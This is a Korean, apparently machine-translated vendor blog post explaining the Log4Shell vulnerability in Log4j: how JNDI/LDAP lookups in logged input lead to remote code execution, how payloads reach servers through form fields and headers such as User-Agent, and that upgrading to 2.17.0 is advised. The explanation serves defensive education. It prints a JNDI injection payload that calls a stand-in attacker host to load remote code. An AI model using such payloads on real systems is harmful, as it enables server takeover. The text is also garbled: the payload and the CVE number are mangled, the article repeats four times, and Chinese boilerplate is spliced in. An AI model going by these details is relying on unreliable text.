Log4j 취약점 설명 - 공격 벡터 및 예방 방법
12월 9일, 자바 라이브러리 Log4j의 0일 익스플로잇이 공개되었습니다. CVE-44228, 더빙 로그4셸, 익스플로잇으로 인해 원격 코드가 실행될 수 있으므로 “높은 심각도” 등급을 받았습니다 (레이스).게다가 log4j-core는 가장 일반적으로 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션을 위험에 빠뜨립니다.
Log4Shell을 다루는 데 필요한 기술을 빠르게 레벨업하고 싶으십니까?
Log4Shell의 기본 개념부터 시작하여 Mission이라는 시뮬레이터에서 이 취약점의 악용을 경험해 볼 수 있는 쇼케이스를 만들었습니다.이번 미션에서는 Log4j 취약점이 인프라 및 애플리케이션에 어떤 영향을 미칠 수 있는지 안내해 드리겠습니다. 쇼케이스로 바로 이동하려면 여기를 클릭하세요또는 이 취약성에 대해 자세히 알아보려면 계속 읽어 보십시오.
옛날 뉴스?
익스플로잇은 새로운 것이 아닙니다.보안 연구원들은 이미 2016년 블랙햇 강연에서 알바로 무뇨스와 올렉산드르 미로쉬 강조했습니다.”응용 프로그램은 신뢰할 수 없는 데이터로 JNDI 조회를 수행하지 않아야 합니다.” 와 함께 대상 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어질 수 있는지 설명했습니다.이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 인젝션 페이로드는 다음과 같습니다.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
다음으로 JNDI가 있거나 Java 이름 지정 및 디렉토리 인터페이스, LDAP, DNS, RMI 등과 같은 프로토콜을 사용하여 서비스에 연결하여 데이터 또는 리소스를 검색할 수 있도록 하는 API입니다.간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 대상으로 검색을 수행합니다.예를 들어 해당 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 이 파일은 그 대가로 취약한 서버에서 실행됩니다.
이 취약점을 그토록 문제삼는 것은 Log4j가 모든 로그 항목을 평가하고 “jndi” 접두사가 붙은 EL 구문으로 작성된 모든 기록된 사용자 입력을 조회한다는 것입니다.페이로드는 양식 필드와 같이 사용자가 데이터를 입력할 수 있는 모든 위치에 삽입할 수 있습니다.또한 HTTP 헤더 (예: 유저 에이전트 과 X-Forwarded-For, 및 기타 헤더는 페이로드를 전달하도록 사용자 지정할 수 있습니다.
익스플로잇을 직접 경험하려면 쇼케이스로 가서 2단계 - “경험 임팩트”로 넘어가세요..
예방: 인식
Log4j가 취약한 코드를 패치하고 있으므로 업그레이드는 모든 애플리케이션에 권장되는 조치입니다.그러나 버전 2.15.0 및 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어 12월 말부터 2.17.0으로 업그레이드하는 것이 좋습니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다.Log4Shell은 타사 프레임워크나 라이브러리를 사용할 때 위험이 따른다는 것을 알게 되었습니다.우리는 순진하게 안전하다고 생각하는 외부 소스를 사용하면 애플리케이션의 보안이 손상될 수 있다는 사실을 염두에 두어야 합니다.
이 취약점을 방지할 수 있었을까요?네, 아니오.한편으로는 취약한 구성 요소가 타사 소프트웨어를 통해 도입되는 경우에만 개발자가 할 수 있는 일이 많습니다.반면, 이를 통해 얻은 교훈은 계속 반복되어 온 것입니다. 즉, 사용자 입력을 절대 믿지 말라는 것입니다.
Secure Code Warrior는 보안을 중시하는 개발자가 코드의 취약점 발생을 방지하는 최선의 방법이라고 믿습니다.SCW는 프로그래밍 프레임워크별 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용하여 영향을 받는 Java 개발자가 누구인지 신속하게 파악할 수 있었습니다.또한 SCW 교육을 받은 보안 전문가의 도움을 받아 Log4j 업그레이드를 가속화했습니다.
특히 자바 개발자를 위해 시큐어 코드 워리어는 무료 IntelliJ 플러그인인 Sensei를 제공합니다.이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 해결하는 데 사용할 수 있습니다.규칙을 직접 만들거나 미리 만들어진 규칙을 사용할 수 있습니다. 요리책.우리를 둘러보세요 조리법, 그리고 우리의 다운로드를 잊지 마세요 Log4j 쿡북 눈 깜짝 할 사이에 Log4Shell 취약점을 찾아 해결하는 데 도움이됩니다.
Log4Shell을 상대로 방어 기술을 업그레이드하세요
이 블로그 게시물에서 배운 내용을 실제로 적용하고 싶으신가요?쇼케이스가 도움이 될 수 있습니다.쇼케이스를 시작할 때 이 취약점을 빠르게 검토한 다음, 안내된 지침에 따라 익스플로잇을 시도할 수 있는 시뮬레이션 환경으로 이동하게 됩니다.
2021년 12월, 자바 라이브러리 Log4j에 심각한 보안 취약점 Log4Shell이 공개되었습니다.이 문서에서는 Log4Shell 취약점을 가장 간단한 형태로 세분화하여 기본 사항을 파악하고 이 취약점에 대한 지식을 바탕으로 시뮬레이션된 웹 사이트를 악용해 볼 수 있는 놀이터를 소개합니다.
Secure Code Warrior致力于在整个软件开发生命周期中保护代码,并帮助组织建立将网络安全置于首位的文化。无论您是应用安全管理员、开发人员、首席信息安全官还是任何与安全相关的人员,我们都能协助您的组织降低与不安全代码相关的风险。
预约演示
Laura Verheyde 是Secure Code Warrior 的一名软件开发人员,主要负责研究漏洞并为Missions 和编码实验室创建内容。
12월 9일, 자바 라이브러리 Log4j의 0일 익스플로잇이 공개되었습니다. CVE-44228, 더빙 로그4셸, 익스플로잇으로 인해 원격 코드가 실행될 수 있으므로 “높은 심각도” 등급을 받았습니다 (레이스).게다가 log4j-core는 가장 일반적으로 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션을 위험에 빠뜨립니다.
Log4Shell을 다루는 데 필요한 기술을 빠르게 레벨업하고 싶으십니까?
Log4Shell의 기본 개념부터 시작하여 Mission이라는 시뮬레이터에서 이 취약점의 악용을 경험해 볼 수 있는 쇼케이스를 만들었습니다.이번 미션에서는 Log4j 취약점이 인프라 및 애플리케이션에 어떤 영향을 미칠 수 있는지 안내해 드리겠습니다. 쇼케이스로 바로 이동하려면 여기를 클릭하세요또는 이 취약성에 대해 자세히 알아보려면 계속 읽어 보십시오.
옛날 뉴스?
익스플로잇은 새로운 것이 아닙니다.보안 연구원들은 이미 2016년 블랙햇 강연에서 알바로 무뇨스와 올렉산드르 미로쉬 강조했습니다.”응용 프로그램은 신뢰할 수 없는 데이터로 JNDI 조회를 수행하지 않아야 합니다.” 와 함께 대상 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어질 수 있는지 설명했습니다.이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 인젝션 페이로드는 다음과 같습니다.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
다음으로 JNDI가 있거나 Java 이름 지정 및 디렉토리 인터페이스, LDAP, DNS, RMI 등과 같은 프로토콜을 사용하여 서비스에 연결하여 데이터 또는 리소스를 검색할 수 있도록 하는 API입니다.간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 대상으로 검색을 수행합니다.예를 들어 해당 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 이 파일은 그 대가로 취약한 서버에서 실행됩니다.
이 취약점을 그토록 문제삼는 것은 Log4j가 모든 로그 항목을 평가하고 “jndi” 접두사가 붙은 EL 구문으로 작성된 모든 기록된 사용자 입력을 조회한다는 것입니다.페이로드는 양식 필드와 같이 사용자가 데이터를 입력할 수 있는 모든 위치에 삽입할 수 있습니다.또한 HTTP 헤더 (예: 유저 에이전트 과 X-Forwarded-For, 및 기타 헤더는 페이로드를 전달하도록 사용자 지정할 수 있습니다.
익스플로잇을 직접 경험하려면 쇼케이스로 가서 2단계 - “경험 임팩트”로 넘어가세요..
예방: 인식
Log4j가 취약한 코드를 패치하고 있으므로 업그레이드는 모든 애플리케이션에 권장되는 조치입니다.그러나 버전 2.15.0 및 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어 12월 말부터 2.17.0으로 업그레이드하는 것이 좋습니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다.Log4Shell은 타사 프레임워크나 라이브러리를 사용할 때 위험이 따른다는 것을 알게 되었습니다.우리는 순진하게 안전하다고 생각하는 외부 소스를 사용하면 애플리케이션의 보안이 손상될 수 있다는 사실을 염두에 두어야 합니다.
이 취약점을 방지할 수 있었을까요?네, 아니오.한편으로는 취약한 구성 요소가 타사 소프트웨어를 통해 도입되는 경우에만 개발자가 할 수 있는 일이 많습니다.반면, 이를 통해 얻은 교훈은 계속 반복되어 온 것입니다. 즉, 사용자 입력을 절대 믿지 말라는 것입니다.
Secure Code Warrior는 보안을 중시하는 개발자가 코드의 취약점 발생을 방지하는 최선의 방법이라고 믿습니다.SCW는 프로그래밍 프레임워크별 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용하여 영향을 받는 Java 개발자가 누구인지 신속하게 파악할 수 있었습니다.또한 SCW 교육을 받은 보안 전문가의 도움을 받아 Log4j 업그레이드를 가속화했습니다.
특히 자바 개발자를 위해 시큐어 코드 워리어는 무료 IntelliJ 플러그인인 Sensei를 제공합니다.이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 해결하는 데 사용할 수 있습니다.규칙을 직접 만들거나 미리 만들어진 규칙을 사용할 수 있습니다. 요리책.우리를 둘러보세요 조리법, 그리고 우리의 다운로드를 잊지 마세요 Log4j 쿡북 눈 깜짝 할 사이에 Log4Shell 취약점을 찾아 해결하는 데 도움이됩니다.
Log4Shell을 상대로 방어 기술을 업그레이드하세요
이 블로그 게시물에서 배운 내용을 실제로 적용하고 싶으신가요?쇼케이스가 도움이 될 수 있습니다.쇼케이스를 시작할 때 이 취약점을 빠르게 검토한 다음, 안내된 지침에 따라 익스플로잇을 시도할 수 있는 시뮬레이션 환경으로 이동하게 됩니다.
12월 9일, 자바 라이브러리 Log4j의 0일 익스플로잇이 공개되었습니다. CVE-44228, 더빙 로그4셸, 익스플로잇으로 인해 원격 코드가 실행될 수 있으므로 “높은 심각도” 등급을 받았습니다 (레이스).게다가 log4j-core는 가장 일반적으로 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션을 위험에 빠뜨립니다.
Log4Shell을 다루는 데 필요한 기술을 빠르게 레벨업하고 싶으십니까?
Log4Shell의 기본 개념부터 시작하여 Mission이라는 시뮬레이터에서 이 취약점의 악용을 경험해 볼 수 있는 쇼케이스를 만들었습니다.이번 미션에서는 Log4j 취약점이 인프라 및 애플리케이션에 어떤 영향을 미칠 수 있는지 안내해 드리겠습니다. 쇼케이스로 바로 이동하려면 여기를 클릭하세요또는 이 취약성에 대해 자세히 알아보려면 계속 읽어 보십시오.
옛날 뉴스?
익스플로잇은 새로운 것이 아닙니다.보안 연구원들은 이미 2016년 블랙햇 강연에서 알바로 무뇨스와 올렉산드르 미로쉬 강조했습니다.”응용 프로그램은 신뢰할 수 없는 데이터로 JNDI 조회를 수행하지 않아야 합니다.” 와 함께 대상 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어질 수 있는지 설명했습니다.이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 인젝션 페이로드는 다음과 같습니다.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
다음으로 JNDI가 있거나 Java 이름 지정 및 디렉토리 인터페이스, LDAP, DNS, RMI 등과 같은 프로토콜을 사용하여 서비스에 연결하여 데이터 또는 리소스를 검색할 수 있도록 하는 API입니다.간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 대상으로 검색을 수행합니다.예를 들어 해당 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 이 파일은 그 대가로 취약한 서버에서 실행됩니다.
이 취약점을 그토록 문제삼는 것은 Log4j가 모든 로그 항목을 평가하고 “jndi” 접두사가 붙은 EL 구문으로 작성된 모든 기록된 사용자 입력을 조회한다는 것입니다.페이로드는 양식 필드와 같이 사용자가 데이터를 입력할 수 있는 모든 위치에 삽입할 수 있습니다.또한 HTTP 헤더 (예: 유저 에이전트 과 X-Forwarded-For, 및 기타 헤더는 페이로드를 전달하도록 사용자 지정할 수 있습니다.
익스플로잇을 직접 경험하려면 쇼케이스로 가서 2단계 - “경험 임팩트”로 넘어가세요..
예방: 인식
Log4j가 취약한 코드를 패치하고 있으므로 업그레이드는 모든 애플리케이션에 권장되는 조치입니다.그러나 버전 2.15.0 및 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어 12월 말부터 2.17.0으로 업그레이드하는 것이 좋습니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다.Log4Shell은 타사 프레임워크나 라이브러리를 사용할 때 위험이 따른다는 것을 알게 되었습니다.우리는 순진하게 안전하다고 생각하는 외부 소스를 사용하면 애플리케이션의 보안이 손상될 수 있다는 사실을 염두에 두어야 합니다.
이 취약점을 방지할 수 있었을까요?네, 아니오.한편으로는 취약한 구성 요소가 타사 소프트웨어를 통해 도입되는 경우에만 개발자가 할 수 있는 일이 많습니다.반면, 이를 통해 얻은 교훈은 계속 반복되어 온 것입니다. 즉, 사용자 입력을 절대 믿지 말라는 것입니다.
Secure Code Warrior는 보안을 중시하는 개발자가 코드의 취약점 발생을 방지하는 최선의 방법이라고 믿습니다.SCW는 프로그래밍 프레임워크별 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용하여 영향을 받는 Java 개발자가 누구인지 신속하게 파악할 수 있었습니다.또한 SCW 교육을 받은 보안 전문가의 도움을 받아 Log4j 업그레이드를 가속화했습니다.
특히 자바 개발자를 위해 시큐어 코드 워리어는 무료 IntelliJ 플러그인인 Sensei를 제공합니다.이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 해결하는 데 사용할 수 있습니다.규칙을 직접 만들거나 미리 만들어진 규칙을 사용할 수 있습니다. 요리책.우리를 둘러보세요 조리법, 그리고 우리의 다운로드를 잊지 마세요 Log4j 쿡북 눈 깜짝 할 사이에 Log4Shell 취약점을 찾아 해결하는 데 도움이됩니다.
Log4Shell을 상대로 방어 기술을 업그레이드하세요
이 블로그 게시물에서 배운 내용을 실제로 적용하고 싶으신가요?쇼케이스가 도움이 될 수 있습니다.쇼케이스를 시작할 때 이 취약점을 빠르게 검토한 다음, 안내된 지침에 따라 익스플로잇을 시도할 수 있는 시뮬레이션 환경으로 이동하게 됩니다.
12월 9일, 자바 라이브러리 Log4j의 0일 익스플로잇이 공개되었습니다. CVE-44228, 더빙 로그4셸, 익스플로잇으로 인해 원격 코드가 실행될 수 있으므로 “높은 심각도” 등급을 받았습니다 (레이스).게다가 log4j-core는 가장 일반적으로 사용되는 Java 로깅 라이브러리 중 하나이므로 수백만 개의 애플리케이션을 위험에 빠뜨립니다.
Log4Shell을 다루는 데 필요한 기술을 빠르게 레벨업하고 싶으십니까?
Log4Shell의 기본 개념부터 시작하여 Mission이라는 시뮬레이터에서 이 취약점의 악용을 경험해 볼 수 있는 쇼케이스를 만들었습니다.이번 미션에서는 Log4j 취약점이 인프라 및 애플리케이션에 어떤 영향을 미칠 수 있는지 안내해 드리겠습니다. 쇼케이스로 바로 이동하려면 여기를 클릭하세요또는 이 취약성에 대해 자세히 알아보려면 계속 읽어 보십시오.
옛날 뉴스?
익스플로잇은 새로운 것이 아닙니다.보안 연구원들은 이미 2016년 블랙햇 강연에서 알바로 무뇨스와 올렉산드르 미로쉬 강조했습니다.”응용 프로그램은 신뢰할 수 없는 데이터로 JNDI 조회를 수행하지 않아야 합니다.” 와 함께 대상 JNDI/LDAP 주입이 어떻게 원격 코드 실행으로 이어질 수 있는지 설명했습니다.이것이 바로 Log4Shell의 핵심입니다.
공격 벡터
Log4Shell의 인젝션 페이로드는 다음과 같습니다.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
다음으로 JNDI가 있거나 Java 이름 지정 및 디렉토리 인터페이스, LDAP, DNS, RMI 등과 같은 프로토콜을 사용하여 서비스에 연결하여 데이터 또는 리소스를 검색할 수 있도록 하는 API입니다.간단히 말해, 위의 악성 페이로드 예시에서 JNDI는 공격자가 제어하는 LDAP 서버를 대상으로 검색을 수행합니다.예를 들어 해당 응답은 악성 코드가 포함된 Java 클래스 파일을 가리킬 수 있으며, 이 파일은 그 대가로 취약한 서버에서 실행됩니다.
이 취약점을 그토록 문제삼는 것은 Log4j가 모든 로그 항목을 평가하고 “jndi” 접두사가 붙은 EL 구문으로 작성된 모든 기록된 사용자 입력을 조회한다는 것입니다.페이로드는 양식 필드와 같이 사용자가 데이터를 입력할 수 있는 모든 위치에 삽입할 수 있습니다.또한 HTTP 헤더 (예: 유저 에이전트 과 X-Forwarded-For, 및 기타 헤더는 페이로드를 전달하도록 사용자 지정할 수 있습니다.
익스플로잇을 직접 경험하려면 쇼케이스로 가서 2단계 - “경험 임팩트”로 넘어가세요..
예방: 인식
Log4j가 취약한 코드를 패치하고 있으므로 업그레이드는 모든 애플리케이션에 권장되는 조치입니다.그러나 버전 2.15.0 및 2.16.0에는 DDoS 및 기타 취약점이 포함되어 있어 12월 말부터 2.17.0으로 업그레이드하는 것이 좋습니다.
코드를 작성하는 개발자로서 우리는 항상 보안을 고려해야 합니다.Log4Shell은 타사 프레임워크나 라이브러리를 사용할 때 위험이 따른다는 것을 알게 되었습니다.우리는 순진하게 안전하다고 생각하는 외부 소스를 사용하면 애플리케이션의 보안이 손상될 수 있다는 사실을 염두에 두어야 합니다.
이 취약점을 방지할 수 있었을까요?네, 아니오.한편으로는 취약한 구성 요소가 타사 소프트웨어를 통해 도입되는 경우에만 개발자가 할 수 있는 일이 많습니다.반면, 이를 통해 얻은 교훈은 계속 반복되어 온 것입니다. 즉, 사용자 입력을 절대 믿지 말라는 것입니다.
Secure Code Warrior는 보안을 중시하는 개발자가 코드의 취약점 발생을 방지하는 최선의 방법이라고 믿습니다.SCW는 프로그래밍 프레임워크별 교육을 대규모로 제공하기 때문에 기업 고객은 보고 데이터를 활용하여 영향을 받는 Java 개발자가 누구인지 신속하게 파악할 수 있었습니다.또한 SCW 교육을 받은 보안 전문가의 도움을 받아 Log4j 업그레이드를 가속화했습니다.
특히 자바 개발자를 위해 시큐어 코드 워리어는 무료 IntelliJ 플러그인인 Sensei를 제공합니다.이 규칙 기반 코드 분석 도구는 코딩 지침을 적용하고 취약점을 예방 및 해결하는 데 사용할 수 있습니다.규칙을 직접 만들거나 미리 만들어진 규칙을 사용할 수 있습니다. 요리책.우리를 둘러보세요 조리법, 그리고 우리의 다운로드를 잊지 마세요 Log4j 쿡북 눈 깜짝 할 사이에 Log4Shell 취약점을 찾아 해결하는 데 도움이됩니다.
Log4Shell을 상대로 방어 기술을 업그레이드하세요
이 블로그 게시물에서 배운 내용을 실제로 적용하고 싶으신가요?쇼케이스가 도움이 될 수 있습니다.쇼케이스를 시작할 때 이 취약점을 빠르게 검토한 다음, 안내된 지침에 따라 익스플로잇을 시도할 수 있는 시뮬레이션 환경으로 이동하게 됩니다.
%20(1).avif)
.avif)
